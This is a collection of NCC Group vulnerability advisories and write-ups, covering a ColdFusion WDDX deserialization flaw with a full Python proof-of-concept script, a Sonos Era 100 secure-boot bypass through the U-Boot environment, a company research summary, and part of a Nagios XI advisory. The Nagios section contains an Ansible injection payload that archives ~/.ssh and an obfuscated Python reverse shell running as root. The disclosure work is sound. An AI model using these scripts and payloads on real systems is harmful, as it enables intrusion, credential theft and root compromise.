Avoid deserializing user-controlled data where possible, especially in instances where attackers can provide class names and functions, which can result in remote code execution. The existing patch uses a deny list, which is not recommended, as it is not possible to list and filter all possible attacks that could target the ColdFusion server. This is especially true given the ability to load additional third-party Java files which could be targeted.
Instead, if the deserialization is a critical part of functionality which cannot be changed, an allow list should be used instead of a deny list. This allows the small number of classes required by this functionality to be carefully reviewed and listed, whilst minimising the likelihood of an attack against these classes. Although an allow list is a much better alternative to a deny list, it is still not a fully secure solution, as vulnerabilities may exist within the allowed classes. Likewise, future changes and updates to the allowed classes may introduce vulnerabilities that the developer may not be aware of.
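The allow-list approach can be illustrated with a minimal Python sketch, using Python's pickle in place of Java/WDDX deserialization (the allowed class set here is purely illustrative):

```python
import io
import pickle

# Only classes that have been explicitly reviewed may be deserialized;
# everything else is rejected, rather than trying to enumerate every
# dangerous class in a deny list.
ALLOWED_CLASSES = {
    ("builtins", "dict"),
    ("builtins", "list"),
}

class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every class reference in the pickle stream.
        if (module, name) not in ALLOWED_CLASSES:
            raise pickle.UnpicklingError(
                f"class {module}.{name} is not on the allow list")
        return super().find_class(module, name)

def safe_loads(data: bytes):
    return AllowListUnpickler(io.BytesIO(data)).load()
```

A plain container round-trips unharmed, while a gadget-style payload that references a class such as os.system is rejected before anything is instantiated.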
coldfusion-wddx.py
The following proof of concept script “coldfusion-wddx.py” has been
provided to demonstrate the various vulnerabilities outlined in this
post.
import argparse
import requests
import sys
import enum
URL = None
VERBOSITY = None

class LogLevel(enum.Enum):
    NONE = 0
    MINIMAL = 1
    NORMAL = 2
    DEBUG = 3

class ExitStatus(enum.Enum):
    SUCCESS = 0
    CONNECTION_FAILED = 1
    FUNCTION_MUST_BE_SET = 2
    DIRECTORY_NOT_FOUND = 3
    FILE_NOT_FOUND = 4
    FAIL_SET_CCS_CLUSTER_NAME = 5
    FAIL_SET_CCS_ENV = 6

# Log the msg to stdout if the verbosity level is >= the given level
def log(level, msg):
    if VERBOSITY.value >= level.value:
        print(msg)

# Show a result and exit
def resultObj(obj):
    if VERBOSITY == LogLevel.MINIMAL and 'minimal' in obj:
        log(LogLevel.MINIMAL, obj['minimal'])
    log(LogLevel.NORMAL, obj['normal'])
    sys.exit(obj['status'].value)

# Show a result and exit success/fail wrapper
def result(code, successObj, failObj):
    # Success occurs when a server error occurs
    if code == 500:
        return resultObj(successObj)
    return resultObj(failObj)

# Build the WDDX Deserialization Packet
def getPayload(cls, function, argument, type='string'):
    name = function
    # Validate the function begins with "set"
    if name[0:3] != 'set':
        log(LogLevel.MINIMAL, '[-] Target function must begin with "set"!')
        sys.exit(ExitStatus.FUNCTION_MUST_BE_SET.value)
    # Remove "set" prefix
    name = function[3:]
    # Lowercase first letter
    name = name[0].lower() + name[1:]
    return f"""<wddxPacket version='1.0'>
  <header/>
  <data>
    <struct type='x{cls}x'>
      <var name='{name}'>
        <{type}>{argument}</{type}>
      </var>
    </struct>
  </data>
</wddxPacket>"""

# Perform the POST request to the ColdFusion server
def request(cls, function, argument, type='string'):
    payload = getPayload(cls, function, argument, type)
    log(LogLevel.DEBUG, '[#] Sending HTTP POST request with the following XML payload:')
    log(LogLevel.DEBUG, payload)
    try:
        r = requests.post(URL, data={
            'argumentCollection': payload
        }, headers={
            'Content-Type': 'application/x-www-form-urlencoded'
        })
        log(LogLevel.DEBUG, f'[#] Retrieved HTTP status code {r.status_code}')
        return r.status_code
    except requests.exceptions.ConnectionError:
        log(LogLevel.MINIMAL, '[-] Failed to connect to target ColdFusion server!')
        sys.exit(ExitStatus.CONNECTION_FAILED.value)

# Handle the execute command
def execute(classpath, method, argument, type):
    log(LogLevel.NORMAL, f'[#]')
    log(LogLevel.NORMAL, f'[!] Execute restrictions:')
    log(LogLevel.NORMAL, f'[!] * Class')
    log(LogLevel.NORMAL, f'[!]   * Public constructor')
    log(LogLevel.NORMAL, f'[!]   * No constructor arguments')
    log(LogLevel.NORMAL, f'[!] * Function')
    log(LogLevel.NORMAL, f'[!]   * Name begins with "set"')
    log(LogLevel.NORMAL, f'[!]   * Public')
    log(LogLevel.NORMAL, f'[!]   * Not static')
    log(LogLevel.NORMAL, f'[!]   * One argument')
    log(LogLevel.NORMAL, f'[#]')
    code = request(classpath, method, argument, type)
    if VERBOSITY == LogLevel.MINIMAL:
        log(LogLevel.MINIMAL, f'{code}')
    log(LogLevel.NORMAL, f'[#] HTTP Code: {code}')
    sys.exit(ExitStatus.SUCCESS.value if code == 500 else code)

# Handle the directory existence command
def directoryExists(path):
    code = request('coldfusion.tagext.io.cache.CacheTag', 'setDirectory', path)
    result(code, {
        'minimal': 'valid',
        'normal': '[+] Directory exists',
        'status': ExitStatus.SUCCESS,
    }, {
        'minimal': 'invalid',
        'normal': '[-] Directory does not exist',
        'status': ExitStatus.DIRECTORY_NOT_FOUND,
    })

# Handle the file existence command
def fileExists(path):
    code = request('coldfusion.tagext.net.LdapTag', 'setClientCert', path)
    result(code, {
        'minimal': 'valid',
        'normal': '[+] File exists',
        'status': ExitStatus.SUCCESS,
    }, {
        'minimal': 'invalid',
        'normal': '[-] File does not exist',
        'status': ExitStatus.FILE_NOT_FOUND,
    })

# Set CCS Cluster Name
def setCCsClusterName(name):
    code = request('coldfusion.centralconfig.client.CentralConfigClientUtil', 'setClusterName', name)
    result(code, {
        'minimal': 'success',
        'normal': '[+] Set CCS cluster name',
        'status': ExitStatus.SUCCESS,
    }, {
        'minimal': 'failed',
        'normal': '[-] Failed to set CCS cluster name',
        'status': ExitStatus.FAIL_SET_CCS_CLUSTER_NAME,
    })

# Set CCS Environment
def setCcsEnv(env):
    code = request('coldfusion.centralconfig.client.CentralConfigClientUtil', 'setEnv', env)
    result(code, {
        'minimal': 'success',
        'normal': '[+] Set CCS environment',
        'status': ExitStatus.SUCCESS,
    }, {
        'minimal': 'failed',
        'normal': '[-] Failed to set CCS environment',
        'status': ExitStatus.FAIL_SET_CCS_ENV,
    })

def main(args):
    global URL, VERBOSITY
    # Build URL
    URL = f'{args.protocol}://{args.host}:{args.port}{args.cfc}'
    # Set verbosity
    if args.verbosity == 'none':
        VERBOSITY = LogLevel.NONE
    elif args.verbosity == 'minimal':
        VERBOSITY = LogLevel.MINIMAL
    elif args.verbosity == 'normal':
        VERBOSITY = LogLevel.NORMAL
    elif args.verbosity == 'debug':
        VERBOSITY = LogLevel.DEBUG
    log(LogLevel.NORMAL, f'[#] Target: {URL}')
    # Execute
    if args.command == 'execute':
        return execute(args.classpath, args.method, args.argument, args.type)
    # Directory Existence
    if args.command == 'directory-exist':
        return directoryExists(args.path)
    # File Existence
    if args.command == 'file-exist':
        return fileExists(args.path)
    # Set CCS Cluster Name
    if args.command == 'ccs-cluster-name':
        return setCCsClusterName(args.name)
    # Set CCS Environment
    if args.command == 'ccs-env':
        return setCcsEnv(args.env)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='')
    parser.add_argument('host', help='The target server domain or IP address')
    parser.add_argument('-p', '--port', type=int, default=8500, help='The target web server port number (Default: 8500)')
    parser.add_argument('-pr', '--protocol', choices=['https', 'http'], default='http', help='The target web server protocol (Default: http)')
    parser.add_argument('-c', '--cfc', default='/CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=bar&_cfclient=true', help='The target CFC path (Default: /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=bar&_cfclient=true)')
    parser.add_argument('-v', '--verbosity', choices=['none', 'minimal', 'normal', 'debug'], default='normal', help='The level of output (Default: normal)')
    subparsers = parser.add_subparsers(required=True, help='Command', dest='command')
    # Execute
    parserE = subparsers.add_parser('execute', help='Execute a specific class function')
    parserE.add_argument('classpath', help='The target full class path (Example: coldfusion.centralconfig.client.CentralConfigClientUtil)')
    parserE.add_argument('method', help='The set function to execute (Example: setEnv)')
    parserE.add_argument('argument', help='The function argument to pass (Example: development)')
    parserE.add_argument('-t', '--type', default='string', help='The function argument type (Default: string)')
    # Directory Enumeration
    parserD = subparsers.add_parser('directory-exist', help='Check if a directory exists on the target server')
    parserD.add_argument('path', help='The absolute directory path (Examples: /tmp, C:/)')
    # File Enumeration
    parserF = subparsers.add_parser('file-exist', help='Check if a file exists on the target server')
    parserF.add_argument('path', help='The absolute file path (Examples: /etc/passwd, C:/Windows/win.ini)')
    # Set CCS Server Cluster Name
    parserN = subparsers.add_parser('ccs-cluster-name', help='Set the Central Config Server cluster name')
    parserN.add_argument('name', help='The cluster name (Example: _CF_DEFAULT)')
    # Set CCS Server Env
    parserE = subparsers.add_parser('ccs-env', help='Set the Central Config Server environment')
    parserE.add_argument('env', help='The environment name (Example: development)')
    main(parser.parse_args())
Vendor Communication
2023-09-12: Disclosed vulnerability to Adobe
2023-09-12: Adobe opened vulnerability investigation
2023-11-15: Adobe published advisory APSB23-52 containing CVE-2023-44353
NCC Group is a global expert in cybersecurity and risk mitigation,
working with businesses to protect their brand, value and reputation
against the ever-evolving threat landscape. With our knowledge,
experience and global footprint, we are best placed to help businesses
identify, assess, mitigate and respond to the risks they face. We are
passionate about making the Internet safer and revolutionising the way
in which organisations think about cybersecurity.
Research performed by Ilya Zhuravlev supporting the Exploit
Development Group (EDG).
The Era 100 is Sonos’s flagship device, released on March 28th 2023, and is a notable step up from the Sonos One. It was also one of the
target devices for Pwn2Own
Toronto 2023. NCC found multiple security weaknesses within the
bootloader of the device which could be exploited leading to root/kernel
code execution and full compromise of the device.
According to Sonos, the issues reported were patched in an update
released on the 15th of November with no CVE issued or public details of
the security weakness. NCC is not aware of the full scope of devices
impacted by this issue. Users of Sonos devices should ensure they apply any recent updates.
To develop an exploit eligible for the Pwn2Own contest, the first step is to dump the firmware, gain initial access to the device, and perhaps even set up debugging facilities to assist in debugging any potential exploits.
In this article we will document the process of analyzing the
hardware, discovering several issues and developing a persistent secure
boot bypass for the Sonos Era 100.
Exploitation was also chained with a previously disclosed exploit
by bl4sty to obtain EL3 code
execution and obtain cryptographic key material.
Initial recon
After opening the device, we quickly identified UART pins broken out
on the motherboard:
The pinout is TX, RX, GND, Vcc
We can now attach a UART adapter and monitor the boot process:
SM1:BL:511f6b:81ca2f;FEAT:B0F02990:20283000;POC:F;RCY:0;EMMC:0;READ:0;0.0;0.0;CHK:0;
bl2_stage_init 0x01
bl2_stage_init 0xc1
bl2_stage_init 0x02
/* Skipped most of the log here */
U-Boot 2016.11-S767-Strict-Rev0.10 (Oct 13 2022 - 09:14:35 +0000)
SoC: Amlogic S767
Board: Sonos Optimo1 Revision 0x06
Reset: POR
cpu family id not support!!!
thermal ver flag error!
flagbuf is 0xfa!
read calibrated data failed
SOC Temperature -1 C
I2C: ready
DRAM: 1 GiB
initializing iomux_cfg_i2c
register usb cfg[0][1] = 000000007ffabde0
MMC: SDIO Port C: 0
*** Warning - bad CRC, using default environment
In: serial
Out: serial
Err: serial
Init Video as 1920 x 1080 pixel matrix
Net: dwmac.ff3f0000
checking cpuid allowlist (my cpuid is 2b:0b:17:00:01:17:12:00:00:11:33:38:36:55:4d:50)...
allowlist check completed
Hit any key to stop autoboot: 0
pending_unlock: no pending DevUnlock
Image header on sect 0
Magic: 536f7821
Version 1
Bootgen 0
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Image header on sect 1
Magic: 536f7821
Version 1
Bootgen 2
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Both headers OK, bootgens 0 2
uboot: section-1 selected
boot_state 0
364 byte kernel signature verified successfully
JTAG disabled
disable_usb: DISABLE_USB_BOOT fuse already set
disable_usb: DISABLE_JTAG fuse already set
disable_usb: DISABLE_M3_JTAG fuse already set
disable_usb: DISABLE_M4_JTAG fuse already set
srk_fuses: not revoking any more SRK keys (0x1)
srk_fuses: locking SRK revocation fuses
Start the watchdog timer before starting the kernel...
get_kernel_config [id = 1, rev = 6] returning 22
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
## Loading fdt from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'fdt@23' fdt subimage
Description: Flattened Device Tree Sonos Optimo1 V6
Type: Flat Device Tree
Compression: uncompressed
Data Start: 0x00a27fe8
Data Size: 75487 Bytes = 73.7 KiB
Architecture: AArch64
Hash algo: crc32
Hash value: adbd3c21
Verifying Hash Integrity ... crc32+ OK
Booting using the fdt blob at 0xa27fe8
Uncompressing Kernel Image ... OK
Loading Device Tree to 00000000417ea000, end 00000000417ff6de ... OK
Starting kernel ...
vmin:32 b5 0 0!
From this log, we can see that the boot process is very similar to
other Sonos devices. Moreover, despite the marking on the SoC and the
boot log indicating an undocumented Amlogic S767a chip, the first line
of the BootROM log containing “SM1” points us to S905X3, which has a
datasheet available.
Whilst it’s possible to interrupt the U-Boot boot process, Sonos has
gone through several rounds of boot hardening and by now the U-Boot
console is only accessible with a password that is stored hashed inside
the U-Boot binary. Additionally, the set of accessible U-Boot commands
is heavily restricted.
Dumping the eMMC
Continuing to probe the PCB, it was next possible to locate the eMMC data pins in order to attempt an in-circuit eMMC dump. From previous generations of Sonos devices, we knew that the data on the flash is mostly encrypted. Nevertheless, an in-circuit eMMC connection would also allow us to rapidly modify the flash memory contents, without having to take the chip off and put it back on every time.
By probing termination resistors and test points located in the
general area between the SoC and the eMMC chip, first with an
oscilloscope and then with a logic analyzer, it was possible to identify
several candidates for eMMC lines.
To perform an in-circuit dump, we have to connect CLK, CMD, DAT0 and
ground at the minimum. While CLK and CMD are pretty obvious from the
above capture, there are multiple candidates for the DAT0 pin. Moreover,
we could only identify 3 out of 4 data pins at this point. Fortunately,
after trying all 3 of these, it was possible to identify the following
connections:
Note that the extra pin marked as “INT” here is used to interrupt the
BootROM boot process. By connecting it to ground during boot, the
BootROM gets stuck trying to boot from SPINOR, which allows us to
communicate on the eMMC lines without interference.
From there, it was possible to dump the contents of eMMC and confirm
that the bulk of the firmware including the Linux rootfs was
encrypted.
Investigating U-Boot
While we were unable to get access to the Sonos Era 100 U-Boot binary
just yet, previous work on Sonos devices enabled us to obtain a
plaintext binary for the Sonos One U-Boot. At this point we were hoping
that the images would be mostly the same, and that a vulnerability
existed in U-Boot that could be exploited in a black-box manner
utilizing the eMMC read-write capability.
Several such issues were identified and are documented below.
Issue 1: Stored environment
Despite the device not utilizing the stored environment feature of
U-Boot, there’s still an attempt to load the environment from flash at
startup. This appears to stem from a misconfiguration where the
CONFIG_ENV_IS_NOWHERE flag is not set in U-Boot. As a
result, during startup it will try to load the environment from flash
offset 0x500000. Since there’s no valid environment there,
it displays the following warning message over UART:
*** Warning - bad CRC, using default environment
The message goes away when a valid environment is written to that
location. This enables us to set variables such as bootcmd,
essentially bypassing the password-protected Sonos U-Boot console.
However, as mentioned above, the available commands are heavily
restricted.
Issue 2: Unchecked setenv() call
By default on the Sonos Era 100, U-Boot’s “bootcmd” is set to
“sonosboot”. To understand the overall boot process, it was possible to
reverse engineer the custom “sonosboot” handler. On a high level, this
command is responsible for loading and validating the kernel image after
which it passes control to the U-Boot “bootm” built-in. Because “bootm”
uses U-Boot environment variables to control the arguments passed to the
Linux kernel, “sonosboot” makes sure to set them up first before passing
control:
setenv("bootargs", (char *)kernel_cmdline);
There is however no check on the return value of this
setenv call. If it fails, the variable will keep its
previous value, which in our case is the value loaded from the stored
environment.
As it turns out, it is possible to make this setenv call
fail. A somewhat obscure feature of U-Boot allows marking
variables as read-only. For example, by setting
“.flags=bootargs:sr”, the “bootargs” variable becomes read-only and all
future writes without the H_FORCE flag fail.
All we have to do at this point to exploit this issue is to construct
a stored environment that first defines the “bootargs” value, and then
sets it as read-only by defining “.flags=bootargs:sr”. The execution of
“sonosboot” will then proceed into “bootm” and it will start the Linux
kernel with fully controlled command-line arguments.
One way to obtain code execution from there is to insert an
“initrd=0xADDR,0xSIZE” argument which will cause the Linux kernel to
load an initramfs from memory at the specified address, overriding the
built-in image.
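The stored environment needed for this attack can be sketched as follows. This is a minimal illustration: the environment size of 0x2000 and the bootargs contents are assumptions, the real size and padding must match the device's U-Boot configuration, and 0xADDR/0xSIZE remain placeholders.

```python
import struct
import zlib

ENV_SIZE = 0x2000  # assumed environment size; must match the device config

def build_env(variables):
    # U-Boot stored environment layout: a 4-byte little-endian CRC32,
    # followed by NUL-terminated "key=value" entries, an empty entry,
    # and zero padding out to the environment size.
    data = b"".join(f"{k}={v}".encode() + b"\x00" for k, v in variables)
    data += b"\x00"
    assert len(data) <= ENV_SIZE - 4, "environment too large"
    data = data.ljust(ENV_SIZE - 4, b"\x00")
    # A valid CRC silences the "bad CRC, using default environment" warning.
    return struct.pack("<I", zlib.crc32(data)) + data

# Define bootargs first, then mark it read-only ("sr") so that the later
# setenv("bootargs", ...) inside sonosboot fails and our value survives.
env = build_env([
    ("bootargs", "init=/init initrd=0xADDR,0xSIZE"),  # placeholder values
    (".flags", "bootargs:sr"),
])
# 'env' would then be written to flash offset 0x500000 over the eMMC lines.
```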
Issue 3: Malleable firmware image
The exploitation process described above, however, requires that controlled data is placed at a known static address. One way to do that is to abuse the custom Sonos image header. According to U-Boot logs, this is always loaded at address 0x100000:
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
The image header can be represented in pseudocode as follows:
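A hedged reconstruction, with field names taken from the values U-Boot prints in the log above (the 32-bit field widths and little-endian byte order are assumptions):

```python
import struct

# Field names follow the U-Boot log output; widths and endianness assumed.
HEADER_FIELDS = (
    "magic",            # 0x536f7821, ASCII "Sox!"
    "version",
    "bootgen",
    "kernel_offset",    # normally 0x40, but not enforced by U-Boot
    "kernel_checksum",
    "kernel_length",
    "rootfs_offset",
    "rootfs_checksum",
    "rootfs_length",
    "rootfs_format",
)

def parse_header(blob):
    return dict(zip(HEADER_FIELDS, struct.unpack_from("<10I", blob)))

# Example: the section-0 header values from the boot log above.
hdr = parse_header(struct.pack(
    "<10I", 0x536f7821, 1, 0, 0x40, 0x78c13f6f, 0xa2ba18, 0, 0, 0, 2))
```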
The issue is that while the value of kernel_offset is
normally 0x40, it is not enforced by U-Boot. By setting the offset to a
higher value and then filling the empty space with arbitrary data, we
can place the data at a known fixed location in U-Boot memory while
ensuring that the signature check on the image still passes.
Combining all three issues outlined above, it is possible to achieve
persistent code execution within Linux under the /init process as the
“root” user.
Moreover, by inserting a kernel module this access can be escalated
to kernel-mode arbitrary code execution.
Epilogue
There’s just one missing piece and that is to dump the one time
programmable (OTP) data so that we can decrypt any future firmware.
Fortunately, the factory firmware that the device came pre-flashed with
does not contain a fix for the vulnerability disclosed in
https://haxx.in/posts/dumping-the-amlogic-a113x-bootrom/
From there, slight modifications are required to adjust the exploit
for the different EL3 binary of this device. The arbitrary read
primitive provided by the a113x-el3-pwn tool works as-is
and allows for the EL3 image to be dumped. With the adjusted exploit we
were then able to dump full OTP contents and decrypt any future firmware
update for this device.
Disclosure Timeline
2023-09-04: NCC reports issues to Sonos
2023-09-07: Sonos has triaged report and is investigating
2023-11-29: NCC queries Sonos for expected patch date
2023-11-29: Sonos informs NCC that they already shipped a patch on the 15th Nov
2023-11-30: NCC queries why no release notes, CVE or credit for the issues
2023-12-01: NCC informs Sonos that technical details will be published the w/c 4th Dec
Vendor: Sonos
Vendor URL: https://www.sonos.com/
Versions affected:
* Confirmed 73.0-42060
Systems Affected: Sonos Era 100
Author: Ilya Zhuravlev
Advisory URL: Not provided by Sonos. Sonos state an update was released on 2023-11-15 which remediated the issue.
CVE Identifier: N/A
Risk: High
Summary
Sonos Era 100 is a smart speaker released in 2023. A vulnerability exists in the U-Boot component of the firmware which would allow for persistent arbitrary code execution with Linux kernel privileges. This vulnerability could be exploited either by an attacker with physical access to the device, or by obtaining write access to the flash memory through a separate runtime vulnerability.
Impact
An unsigned attacker-controlled rootfs may be loaded by the Linux kernel. This achieves a persistent bypass of the secure boot mechanism, providing early code execution within the Linux userspace under the /init process as the “root” user. It can be further escalated into kernel-mode arbitrary code execution by loading a custom kernel module.
Details
The implementation of the custom “sonosboot” command loads the kernel image, performs the signature check, and then passes execution to the built-in U-Boot “bootm” command. Since “bootm” uses the “bootargs” environment variable as Linux kernel arguments, the “sonosboot” command initializes it with a call to `setenv`:
setenv("bootargs", (char *)kernel_cmdline);
However, the return result of `setenv` is not checked. If this call fails, “bootargs” will keep its previous value and “bootm” will pass it to the Linux kernel.
On the Sonos Era 100, the U-Boot environment is loaded from the eMMC at address 0x500000. Whilst the factory image does not contain a valid U-Boot environment at that location (as confirmed by the presence of the "*** Warning - bad CRC, using default environment" message displayed on UART), it is possible to place a valid environment by directly writing to the eMMC with a hardware programmer.
There is a feature in U-Boot that allows setting environment variables as read-only. For example, setting "bootargs=something" and then ".flags=bootargs:sr" would make any future writes to "bootargs" fail. Thus, the Linux kernel will boot with an attacker-controlled "bootargs".
As a result, it is possible to fully control the Linux kernel command line. From there, an adversary could append the “initrd=0xADDR,0xSIZE” option to load their own initramfs, overwriting the one embedded in the image.
By replacing the “/init” process it is then possible to obtain early persistent code execution on the device.
Recommendation
Consider setting CONFIG_ENV_IS_NOWHERE to disable loading of a U-Boot environment from the flash memory.
Validate the return value of setenv and abort the boot process if the call fails.
Vendor Communication
2023-09-04: Issue reported to vendor.
2023-09-07: Sonos has triaged report and is investigating.
2023-11-29: NCC queries Sonos for expected patch date.
2023-11-29: Sonos informs NCC that they already shipped a patch on the 15th Nov.
2023-11-30: NCC queries why there are no release notes, CVE, or credit for the issues.
2023-12-01: NCC informs Sonos that technical details will be published the w/c 4th Dec.
Over the past two years, our global cybersecurity research has been characterized by unparalleled depth, diversity, and dedication to safeguarding the digital realm. The highlights of our work not only signify our commitment to pushing the boundaries of cybersecurity research but also underscore the tangible impacts and positive change we bring to the technological landscape. This report is a summary of our public-facing security research findings from researchers at NCC Group between January 2022 and December 2023.
With the release of 18 public reports and presentations of our work at over 32 international conferences and seminars, encompassing a variety of technology and cryptographic implementations, we have demonstrated our capacity to scrutinize and enhance key security functions. Notably, our collaborations with tech giants such as Google, Amazon Web Services (AWS), and Kubernetes underscore our pivotal role in fortifying the digital ecosystems of industry leaders.
Commercially, 2022 and 2023 saw us deliver over $3 million in revenue in collaborative research engagements across various technologies and many sectors, increasingly across Artificial Intelligence (AI) and AI-based systems.
In our bid to democratize cybersecurity knowledge, we have released 21 open-source security tools and repositories. These invaluable tools have catalyzed efficiency gains across multiple domains of cybersecurity.
Our research has positioned us at the forefront of evolving cryptographic paradigms. With significant work in Post-Quantum Cryptography, Elliptic Curve Cryptography, and Blockchain security, we remain key players in shaping the future of digital privacy and security.
The meteoric rise of AI/ML applications has been matched by our intense focus on understanding their security dynamics. Our research in this arena has grown exponentially since 2022, providing critical insights into the strengths and vulnerabilities of these transformative technologies.
Modern cloud environments, coupled with rapid shifts in software development and deployment, have necessitated deep dives into their security mechanisms. Our outputs in this domain have been instrumental in pioneering robust cyber defense tactics for contemporary digital infrastructures. Our exhaustive studies into hardware vulnerabilities and Operating System security have set benchmarks in comprehending and countering potential threats.
The external presentation of our research, particularly by our Exploit Development Group (EDG), has won us accolades, most notably a third-place finish at the 2022 Pwn2Own Toronto competition. EDG’s work on exploiting consumer routers and enterprise printers has been ground-breaking. Ken Gannon and Ilyes Beghdadi successfully exploited the Xiaomi 13 Pro smartphone at the 2023 Pwn2Own Toronto competition, demonstrating our continued excellence in mobile security.
Our research has spanned several other pivotal areas including Vulnerability Detection Management, Reverse Engineering, Modern Networking Security, and Secure Programming Development. Unearthing over 69 security vulnerabilities across third party products, we’ve reinforced our commitment to digital safety through responsible and coordinated vulnerability disclosure. Each discovery, while highlighting potential threats, also underscores our unwavering dedication to proactively fortifying global digital infrastructures.
Our journey through 2022 and 2023 has been marked by rigorous research, collaboration, and an unwavering commitment to excellence. As we continue to gain intelligence and insight, and to innovate, our role in shaping a secure digital future remains paramount.
As we look forward to the upcoming year, our excitement is at an all-time high, not just for the innovative projects and growth opportunities on the horizon, but also for the robust safety measures we are putting in place. Making our lives safe, both in our work environments and within our digital realms, remains a top priority. We are actively developing and executing research that leads to enhancing our cybersecurity protocols, introducing tools, and investing in exploring cutting-edge technology to ensure a secure and resilient infrastructure. Our commitment to creating a safer world for everyone is unwavering, and we believe these efforts will significantly contribute to a productive, secure, and successful year ahead for all of us.
This is the second Technical Advisory post in a series wherein I audit the security of popular Remote Monitoring and Management (RMM) tools. (First: Multiple Vulnerabilities in Faronics Insight).
I was joined in this security research by Colin Brum, Principal Security Consultant at NCC Group.
In this post I describe the 16 vulnerabilities which Colin and I discovered in Nagios XI v5.11.1, available at https://www.nagios.com/products/nagios-xi/. Nagios XI is a household name amongst server administrators. Nagios has been one of the go-to applications for remote monitoring and management for decades. As with the other applications in this series of blog posts, Nagios XI provides systems administrators with a central ‘hub’ to monitor and manipulate the state of computers (agents) deployed across the network.
The identified vulnerabilities can be found below, in order of severity –
Root RCE via Ansible Vault File Injection (CVE-2023-47401)
Authentication Not Required For SSH Terminal Functionality
Command Injection in Host Configuration Page (CVE-2023-47408)
Remote Code Execution Via Custom Includes (CVE-2023-47400)
Any Authenticated User Can Manipulate User and System Macros (CVE-2023-47412)
Host Pivot Via Insecure Migration Process Ansible Vault Credentials (CVE-2023-47409)
Local Privilege Escalation via rsyslog abuse (CVE-2023-47414)
Recursive Filesystem Deletion as Root Via Backup Script (CVE-2023-47411)
Stored Cross Site Scripting Vulnerability in Manage Users (CVE-2023-47410)
Unintended Files Can Be Edited By Graph Editor Page (CVE-2023-47413)
1. Root RCE via Ansible Vault File Injection (CVE-2023-47401)
Impact
A malicious actor could obtain code execution with root privileges on any host running Nagios XI. The root user could perform any operation on the host and access, manipulate or destroy all sensitive data that it can manage.
Details
The application exposes a page (“http://server_hostname/nagiosxi/admin/migrate.php”) which allows admins to perform a ‘migration’ from the active Nagios XI server to another server. The UI prompts the user to supply an IP address and credentials for a remote host; this information is then POSTed to the webserver.
The webserver passes the supplied arguments to the following command ‘sudo /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php -a IP_ADDRESS -u USERNAME -p PASSWORD‘. Note that the command is executed as root, due to the use of the sudo command.
The `migrate.php` script creates an encrypted Ansible vault with contents like the following (after decryption) –
The become_user, ansible_ssh_pass and ansible_sudo_pass fields are all populated by attacker supplied data.
During this research, it was observed that it is possible to supply a username parameter to the webserver along the lines of research%0a%20%20name%20:"%7B%7B+lookup%28%5C%22pipe%5C%22%2C+%5C%22tar+-czf+-+%24HOME%2F.ssh%2F+2%3E%2Fdev%2Fnull+%7C+base64+-w0+%5C%22%29+%7D%7D", which URL-decodes to the following (a newline followed by an injected "name" field):
research
  name :"{{ lookup(\"pipe\", \"tar -czf - $HOME/.ssh/ 2>/dev/null | base64 -w0 \") }}"
Ansible allows parameters to be overwritten in Playbooks, so this would essentially change the ‘name’ of the playbook to “{{ lookup(\"pipe\", \"tar -czf - $HOME/.ssh/ 2>/dev/null | base64 -w0 \") }}”.
When `migrate.php` runs the playbook as part of the migration process, the command within the lookup will be executed (as root).
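The decoding step can be checked with Python's standard library (the payload below percent-encodes the literal quotes for clarity; otherwise it matches the username parameter above):

```python
from urllib.parse import unquote_plus

# The malicious username parameter, straight-quote/percent-encoded form.
payload = ('research%0a%20%20name%20:%22%7B%7B+lookup%28%5C%22pipe%5C%22%2C'
           '+%5C%22tar+-czf+-+%24HOME%2F.ssh%2F+2%3E%2Fdev%2Fnull+%7C'
           '+base64+-w0+%5C%22%29+%7D%7D%22')

# '+' becomes a space and %XX sequences are decoded, revealing the
# injected newline and the new `name` field.
decoded = unquote_plus(payload)
print(decoded)
```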
A full attack path can be seen below. Vault injection –
A similar example, where a root reverse shell is returned, is shown below –
---
- name: Migrate Nagios Core
  hosts: all
  become: yes
  remote_user: research
  name: "{{ lookup(\"pipe\", \"python -c 'import socket,os,pty,base64;s=socket.socket();s.connect((chr(49)+chr(57)+chr(50)+chr(46)+chr(49)+chr(54)+chr(56)+chr(46)+chr(49)+chr(50)+chr(48)+chr(46)+chr(49)+chr(51)+chr(49),8081));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(chr(0x62)+chr(0x61)+chr(0x73)+chr(0x68))' \") }}"
A reverse shell as the root user is returned.
2. Authentication Not Required For SSH Terminal Functionality
Risk: High (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
Impact
Successful exploitation of a flaw in this exposed webshell would enable an attacker to fully compromise the webserver host.
Details
During this vulnerability research it was observed that Nagios XI exposes a webshell at http://server_url/nagiosxi/terminal/. Webshell access does not require the user to be authenticated with Nagios XI and it is exposed on all network interfaces, meaning that any attacker on the same network as the Nagios XI webserver can interact with it.
The webshell used is ShellInABox, hosted at https://github.com/shellinabox/shellinabox. It is a large and complex application written in the C programming language. Analysis of the commits in the above Git repository indicates that the application has not been updated in four years, and no release has been made since 2016.
